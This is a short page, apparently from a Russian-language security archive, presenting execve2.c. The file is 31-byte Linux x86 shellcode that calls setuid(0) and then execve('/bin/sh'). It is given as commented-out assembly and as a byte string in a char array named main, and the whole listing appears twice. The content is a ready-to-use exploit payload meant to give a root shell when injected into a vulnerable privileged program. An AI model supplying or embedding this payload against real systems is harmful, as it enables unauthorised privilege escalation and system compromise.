Security Lab

execve2.c

execve2.c
execve2.c
  • ОС: UNIX
  • Ссылки:

31 байтовый shellcode, setuid(0); execve /bin/sh для LINUX.

/*
 * linux x86 shellcode(31 bytes) by The Itch of Netric (www.netric.org)
 * setuid(0); execve("/bin/sh",0);
 *
__asm__("


	xorl    %eax,%eax
	xorl    %ebx,%ebx
	movb    $0x17,%al
	int    $0x80
        
	xorl %eax,%eax
	push %eax
	pushl   $0x68732f6e
	pushl   $0x69622f2f
	mov %esp, %ebx
	push %eax
	push %ebx
	mov %esp,%ecx
	movb $0xb, %al
	int $0x80

");
*/

char main[] =
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */

	"\x31\xc0\x50\x68\x6e\x2f\x73\x68" /* execve() of /bins/h */ 
	"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
	"\x53\x89\xe1\xb0\x0b\xcd\x80";


ОС: Windows UNIX

Ссылки:

31 байтовый shellcode, setuid(0); execve /bin/sh для LINUX.

/*
 * linux x86 shellcode(31 bytes) by The Itch of Netric (www.netric.org)
 * setuid(0); execve("/bin/sh",0);
 *
__asm__("


	xorl    %eax,%eax
	xorl    %ebx,%ebx
	movb    $0x17,%al
	int    $0x80
        
	xorl %eax,%eax
	push %eax
	pushl   $0x68732f6e
	pushl   $0x69622f2f
	mov %esp, %ebx
	push %eax
	push %ebx
	mov %esp,%ecx
	movb $0xb, %al
	int $0x80

");
*/

char main[] =
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */

	"\x31\xc0\x50\x68\x6e\x2f\x73\x68" /* execve() of /bins/h */ 
	"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
	"\x53\x89\xe1\xb0\x0b\xcd\x80";